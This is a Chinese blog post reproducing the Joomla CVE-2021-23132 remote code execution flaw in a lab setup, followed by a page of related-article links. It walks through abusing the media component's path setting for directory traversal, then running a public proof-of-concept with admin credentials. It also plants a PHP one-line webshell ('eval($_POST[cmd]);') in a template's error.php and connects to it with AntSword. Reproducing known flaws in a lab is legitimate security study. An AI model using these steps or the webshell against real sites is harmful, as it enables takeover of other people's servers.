Joomla远程代码执行(CVE-2021-23132)

最新推荐文章于 2024-05-17 09:28:04 发布
最新推荐文章于 2024-05-17 09:28:04 发布
阅读量699 收藏 7
点赞数 5
文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/136186754
版权

漏洞描述:

Joomla是一套知名的内容管理系统,其使用PHP语言和 MySQL数据库开发,可以在Linux、 Windows、MacOSX等各种不同的平台上运行。
在Joomla 3.0.0到3.9.24版本中,Joomla!的com_media组件配置允许被任意修改导致Web级别目录遍历,攻击者通过一系列操作,会导致远程命令执行。 后台路径:/administrator 超级管理员:superadmin:123456 普通管理员:admin:123456

复现过程:

1.访问http://ip:port,出现如下页面,开始实验

2.访问后台管理页面

http://ip:port/administrator

账号:admin

密码:123456

3.点击media

4.点击“Options”,修改Path to Files Folder路径为当前路径“./”
可以看到这里可以操作整个web目录下的文件夹及文件,实现了目录遍历。

借此漏洞,可以访问攻击者想要的敏感数据,包括配置文件、日志、源代码等信息,更加方便攻击者对网站进行渗透。

5.在/administrator/components/com_users下,删除config.xml文件

6.下载poc工具

https://github.com/HoangKien1020/CVE-2021-23132

7.解压zip文件

unzip CVE-2021-23132-main.zip

8.利用poc

python3 cve-2021-23132.py -url http://ip:port -u superadmin -p 123456 -rce 1 -cmd ls

显示成功登录超级管理员账号后,创建了普通管理员,并更改了默认路径,实现了目录遍历这一步,之后删除了config.xml文件,又成功上传了新的config.xml文件,并赋予hk用户超级管理员权限。

9.使用超级管理员hk用户登录后台

账号:hk

密码:12345678

10.选择Extensions->Templates->Templates模块

11.点击Beez3 Details and Files

12.编辑 error.php 页面,直接添加phpinfo();或者PHP一句话木马(eval($_POST[cmd]);),添加完成后,点击上面的Save 保存页面。

13.访问error.php文件,可看到空白页面,证明漏洞复现成功了

http://ip:port/templates/beez3/error.php

14.蚁剑连接

借此漏洞攻击者获取到网站的shell权限,控制整个网站,可以进行文件读取和命令执行。

修复建议:

1.升级版本。

慕筱蚺
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【Vulfocus解题复现】joomla 远程代码执行CVE-2021-23132
温氏效应
11-23 5135
Joomla是一套知名的内容管理系统,其使用PHP语言和 MySQL数据库开发,可以在Linux、 Windows、MacOSX等各种不同的平台上运行 Joomla官方发布安全公告,修复了Joomla中的一个远程代码执行漏洞(CVE-2021-23132),其CVSSv3评分为7.5。由于Joomla com_media模块对上传文件校验不严格,攻击者可以通过上传恶意文件,从而实现远程代码执行
CVE2021-23132
03-27
Joomla RCE(CVE2021-23132)。 com_media允许的路径,不适用于将图像上载到RCE。 在Joomla中发现了一个被分类为严重的漏洞! 3.0.0至3.9.24(内容管理系统)。 此问题影响组件com_media的未知功能。 使用未知输入进行的操作会导致目录遍历漏洞。 此脚本是PoC,能够使用目录遍历或远程代码执行(RCE)模式。 目录遍历以触发RCE。 安装 git clone https://github.com/CyberCommands/CVE2021-23123.git cd CVE-2021-23123/ pip install -r requirements.txt python3 joomla_rce.py --help 例如: python3 joomla_rce.py -l http://target.com -u admin -p
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境
最新发布
weixin_45653478的博客
05-17 482
Joomla是一个基于PHP的内容管理系统(CMS),广泛应用于各类网站。2017年,Joomla 3.7.0版本被发现存在SQL注入漏洞(CVE-2017-8917),攻击者可以利用该漏洞对数据库进行未授权查询或操作,可能导致数据泄露、篡改甚至删除。
joomla 远程代码执行CVE-2021-23132
weixin_68999845的博客
08-16 518
Joomla 3.2.0到3.9.24版本中,Joomla的com_media组件配置允许被任意修改导致Web级别目录遍历,攻击者通过一系列操作,进一步会导致远程命令执行。修复内容为:除了超级管理员外,其余权限的管理员在修改Path to Files Folder的时候只能向后降级如image/xxx。1.下载源码到本地:https://github.com/joomla/joomla-cms。源码下载url:https://github.com/joomla/joomla-cms。
Joomla未授权访问漏洞CVE-2023-23752
dahege666的博客
03-23 2994
漏洞复现
Joomla内核SQL注入漏洞(CVE-2018-8045)
huayimy的博客
12-30 576
Joomla内核SQL注入漏洞(CVE-2018-8045),登录账号密码后会显示报错
Joomla未授权访问漏洞|CVE-2023-23752复现及修复
szgyunyun的博客
03-16 2606
Joomla 4.0.0 至 4.2.7 版本中的 ApiRouter.php#parseApiRoute 在处理用户的 Get 请求时未对请求参数有效过滤,导致攻击者可向 Joomla 服务端点发送包含 public=true 参数的请求(如:/api/index.php/v1/config/application?本公众号的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
CVE-2020-11890:CVE-2020-11890
03-10
Joomla中的远程代码执行(RCE) 使用您的凭据运行cve202011890.py并访问链接rce: 使用docker的指南,例如: #步骤1: docker pull hoangkien1020 / joomla:3.9.16 #第2步: 码头工人运行-d --rm -it -p 8080:80...
CVE-2021-23132:com_media允许的路径不适合用于将图像上载到RCE
03-03
Joomla中的远程代码执行(RCE) 使用您的凭据运行cve-2021-23132.py并访问链接rce: http://target/templates/protostar/error.php?cmd=ls PoC: python3 cve-2021-23132.py -url ...
CVE-2015-7857 Joomla注入漏洞利用工具
04-18
3. **注入执行**:Joomla系统在处理这些请求时,未能正确过滤和转义用户输入,从而允许恶意SQL代码执行。 4. **信息泄露或控制**:成功注入后,攻击者可以读取、修改或删除数据库中的数据,甚至在某些情况下获得...
Joomla远程代码执行漏洞分析小白版(小宇特详解)
小宇的web博客
11-08 3936
Joomla远程代码执行漏洞分析小白版(小宇特详解) 今天看了一下2021陇原战役WP,在看web方向的时候,看到pop链,想了解一下,后来又看到了p师傅在15年的一篇文章,在这里记录一下。这里主要是和反序列化一起讲的。 这个漏洞是在反序列化session 这个漏洞是因为libraries/joomla/session/session.php的_validate函数,将ua和xff调用set方法设置到了session中(session.client.browser和session.client.forwar
Joomla框架搭建&远程代码执行(RCE)漏洞复现
茶寂的博客
12-26 2589
一、漏洞描述 Joomla是一套内容管理系统,是使用PHP语言加上MYSQL数据库所开发的软件系统,最新版本为3.9.12,官网: https://downloads.joomla.org/,漏洞位于根目录下的configuration.php,由于该CMS对函数过滤不严格,导致了远程代码执行漏洞,该漏洞可能导致服务器被入侵、信息泄露等严重风险。 二、漏洞影响版本 Joomla 3.0.0-3.4.6 三、漏洞环境搭建 靶机:WIN10 攻击机:kali 1.下载Joomla3.4.6,链接如下: http
(自用POC)Joomla-CVE-2023-23752
qq_50854662的博客
03-13 249
(自用POC)Joomla-CVE-2023-23752
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞
huayimy的博客
12-30 1060
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞,com_fields组件,启动docker,安装mysql数据库
Joomla目录遍历及远程代码CVE-2021-23132)--避坑指南
huayimy的博客
01-11 878
Joomla目录遍历及远程代码CVE-2021-23132)--避坑指南,脚本复现,在线靶场,版本,phpinfo(),添加webshell添加一句话木马
Joomla目录遍历导致RCE漏洞复现(CVE-2021-23132
不想当脚本小子的脚本小子
03-14 1408
我漏洞复现小王子又回来啦~ 有道云笔记链接::http://note.youdao.com/noteshare?id=399c71dbffbd2d59dc60d015f4a08839&sub=13C13D53B28D4F81AC366215FAC1101C
(CVE-2020-10238)Joomla远程代码执行
m0_55563900的博客
04-17 957
一、实验介绍 1.基本概念 Joomla!是美国Open Source Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。Joomla是一套内容管理系统,是使用PHP语言加上MYSQL数据库所开发的软件系统。 2.影响版本 Joomla <= 3.9.15 二、实验目的 1.掌握漏洞产生的原理 2.了解漏洞影响版本 3.熟悉漏洞的修复方式 三、实验步骤 1.启动靶场查看实验环境; 2.下载执行脚本; 3.运行exp; 4.进行访问shell. 四、修复
JoomlaRCE远程代码执行CVE-2020-11890)复现
锋刃科技的博客
08-17 2372
简介 Joomla! CMS versions 2.5.0 – 3.9.16版本在处理用户组时缺少对根用户组的检查,从而导致了一个提权漏洞的产生(CVE-2020-11890)。 影响版本 CMS versions 2.5.0 - 3.9.16 环境搭建 Joomla下载地址https://downloads.joomla.org/cms/joomla3/3-8-2 我这里下载的是Joomla! 3.8.2 Full Package (.zip) 版本 按照顺序安装即可 ..
CVE-2016-8870
09-16
CVE-2016-8870是Joomla的一个漏洞编号。该漏洞位于Joomla的注册功能代码中,具体位于components/com_users/controllers/user.php和components/com_users/controllers/registration.php中的相应函数中。通过该漏洞,攻击者可以利用无效的令牌进行恶意注册,绕过了注册功能的安全检查。这个漏洞存在于Joomla版本3.6.4之前的版本中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值